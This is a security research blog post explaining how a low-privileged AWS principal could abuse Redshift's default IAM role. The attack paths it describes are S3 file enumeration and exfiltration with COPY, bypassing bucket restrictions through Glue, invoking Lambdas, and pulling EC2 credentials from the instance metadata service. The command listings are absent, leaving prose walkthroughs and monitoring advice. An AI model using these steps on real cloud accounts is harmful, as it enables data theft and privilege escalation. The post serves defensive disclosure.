Redshift Security: Attack Surface Explained

Redshift Security: Attack Surface Explained
Ofir ShatyOfir Shaty
Redshift Security: Attack Surface Explained

In our previous posts (Access and Data Flows, Data Backups and Encryption) we discussed security best practices to implement least privileged access on Redshift and reduce the static risk associated with your sensitive data.

TL;DR In this post we will show how an attacker can exploit security risks to achieve lateral movement and privilege escalation. This allows the threat actor to leverage weak permissions and reach services and data sources they didn’t have access to initially.

What is an attack vector?

An attack vector is the path that an attacker takes along the cyber kill chain in order to fulfill their mission.
The cyber kill chain is a common way to split the attack into stages. It helps in understanding attacks and how to prevent them.

IAM role association

IAM role association allows Redshift to perform strong capabilities like copy, unload, query, and analyze data from external sources. Along with those options the IAM role carries a risk to expose sensitive data.
We have observed many cases where overly permissive roles are attached to Redshift clusters, exposing sensitive data assets and their content to anyone with basic privileges.

Redshift built-in role

In the “create cluster” page AWS allows to create the default role for the Redshift cluster.
The default role contains incredibly powerful permissions, with the attached policy “AmazonRedshiftAllCommandsFullAccess”.

The “AmazonRedshiftAllCommandsFullAccess” is a powerful policy containing excessive privileges that can lead to privilege escalation and lateral movement, even when created with the “No addition S3 bucket” option.
We will show what risks can arise by allowing this policy later.

Next, we will demonstrate how an attacker who gained access to a very basic principal can use this default policy and perform S3 and Glue operations, invoke Lambdas, access Kinesis, fetch secrets to connect to RDS, Athena, and Hive Metastore - all this when only given privileges to create a cluster (“redshift:CreateCluster”).

The following flow diagram shows the possible attack paths:

Basic AWS principal:

For the demo we are using a very basic AWS principal that has the following policy attached which allows:
redshift:CreateCluster’, ‘redshift:DescribeClusters’, ‘iam:PassRole’, ‘ec2:Describe*

Here is a link to the policy


It is recommended to know exactly which AWS principals have the permissions above, as it can potentially lead to unexpected access to other services.

Attackers that gain access to AWS with the above low-privileged principal can create a redshift cluster:

Performing reconnaissance with the COPY command

The COPY command allows the Redshift cluster to load data from external sources like S3, DynamoDB, EMR, and EC2.
The following flow diagram shows the possible attack path when using the COPY command:

In this section we will focus on S3 bucket. The default role contains the following permissions which eventually allow an attacker to “list”, “create”, “delete”, and “get objects” from buckets containing “redshift” in their name:

With access to the newly created redshift cluster, it is necessary to traverse over all the files in the S3 bucket in order to choose the desired files to exfiltrate.
The permissions in the default role give the attacker the ability to do so.

By using the COPY command with <bucket name> instead of <file name> an attacker can perform reconnaissance on the bucket to extract all the files in it:

To make Redshift ignore encoding and length errors the attacker can use the ‘TRUNCATECOLUMNS’ and ‘encoding UTF16BE’ properties.

By querying the “STL_LOAD_COMMITS” table, the attacker can find a list of all the filenames in the bucket:

Using the COPY command, they can list all the files in that bucket.

If an attacker will try to list all files in the bucket with their basic AWS principal, and not from redshift, they will result with “Access Denied” error:

Now that the attacker has the list of files in the bucket it is possible to exfiltrate them one by one with the correct encoding.

Structured data exfiltration with COPY command:

Loading the “employee.csv” file from the S3 bucket above:

Once the data is loaded, the attacker can query the ‘exfil’ table to get the data:

If the attacker will try to download the file with the low-privilege user, the command will result with an error:

Unstructured data exfiltration with COPY command:

Next, the attacker can also exfiltrate unstructured data like a pdf file.
To do so they can add some properties like ‘ACCEPTINVCHARS’, ‘BLANKSASNULL’, ‘IGNOREBLANKLINES’ to make the COPY command succeed:

The attacker can query the output table to get the data:

To make this output human readable the attacker can copy the content and save as pdf file.


It is possible to detect suspicious usages of the COPY command by constantly monitoring the "STL_LOAD_ERRORS" and "STL_LOAD_COMMITS” tables.

Privilege escalation using the CREATE EXTERNAL SCHEMA command:

Using the CREATE EXTERNAL SCHEMA command, which allows querying from external sources, an attacker can escalate privileges and access external data services like Glue, Athena, Kinesis, RDS, and Hive.
The following flow diagram shows the possible attack paths:

To understand how it is possible, let's look at some of the privileges of the default role:

ListSecrets & GetSecretValue allow users in Redshift to connect to remote sources like RDS, Athena, and Hive Metastore.
The Redshift cluster gets the secret from the Secret Manager and opens a connection to the external service.

Redshift’s default role has interesting permissions for Glue as well.
Glue has many usages, especially as an ETL pipe to move data from and to multiple sources (S3, Kinesis or Kafka).
The permissions in the default policy:

It means that the Redshift cluster has permission to create and drop databases, get or delete tables in Glue, and more.

The default role allows performing actions on S3 buckets containing “redshift” in their name, but since Glue is not restricted by that policy, an attacker can leverage the Glue service to bypass name restriction to reach other S3 buckets that don’t contain the string “redshift” in their name.

The following flow diagram shows the possible attack paths:

In this case Glue database “attack-redshift” with the table “lake” that maps to S3 bucket called “ofir-data-lake”:

Attackers can access Glue objects from Redshift with the following command:

At this point, the attacker managed to access the S3 bucket files which were not accessible before!

If the attacker tries to access the same file with the COPY command it will result with an error:

Invoking Lambda functions with CREATE EXTERNAL FUNCTION

Redshift's default role also has permission to invoke any lambda function containing the string “redshift”:

The following flow diagram shows the possible attack paths:

If an attacker tries to invoke the lambda function “lateral_movement_with_redshift_lambda” with the low-privilege AWS principal, it will result with permission denied:

If the attacker tries to do the same from within Redshift:

The lambda will be invoked successfully!:

Extracting temporary credentials from EC2:

A smart attacker will follow the golden path and will try to extend the grip.
Using the COPY command, an attacker can execute commands over SSH on EC2 which in turn will allow them to extract the credentials attached to that instance.


  • EC2 should have IAM role attached
  • EC2 authorized_keys should contain Redshift cluster public key
  • EC2 should use the IMDS
  • Manifest file should be uploaded to a location in S3

To extract EC2 credentials, an attacker can take advantage of the Instance Metadata Service (IMDS).
By querying the IMDS it is possible to retrieve the temporary credentials attached to the instance along with other metadata information.
To do so, the attacker can execute the following command in the EC2:

The attacker can upload the following manifest file with the above command to S3:

Then execute it from Redshift and load the information into the “listing” table:

To view the output of the command, the attacker can query the table they created:

Now the attacker needs to modify the manifest command to contain the role name returned in the previous step and re-execute one more time to get the credentials.
Also, since the credentials can be long, it is necessary to encode the output in base64:

Attackers that execute the command will get the FULL credentials encoded in base64:

The attacker can decode the result back to a readable text and extract the credentials:


We saw some powerful attack vectors that an attacker can perform by leveraging ‘redshift:CreateCluster’ permission to escalate privileges, move laterally, and eventually access different resources and exfiltrate sensitive data.

Along with the powerful features that Redshift provides, it is important to make sure that we use the principle of least privilege, and keep in mind that attackers may use legit actions in their quest.

Therefore, it is important to constantly monitor the logs for suspicious activity.

Be safe and Secure, Dig :-)

About the Authors

Ofir Shaty is a Senior Security Researcher at Dig Security. A member of the Security Research team, Ofir has over 6 years of experience in Data Security and Web Application Security. When away from work on sunny days Ofir likes to hit the road with his motorcycle.
Ofir Balassiano is leading the security research team at Dig Security.
Ofir has over 8 years of experience in security research specifically in cloud security as well as low-level OS internals research.


Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed consectetur do eiusmod tempor incididunt eiusmod.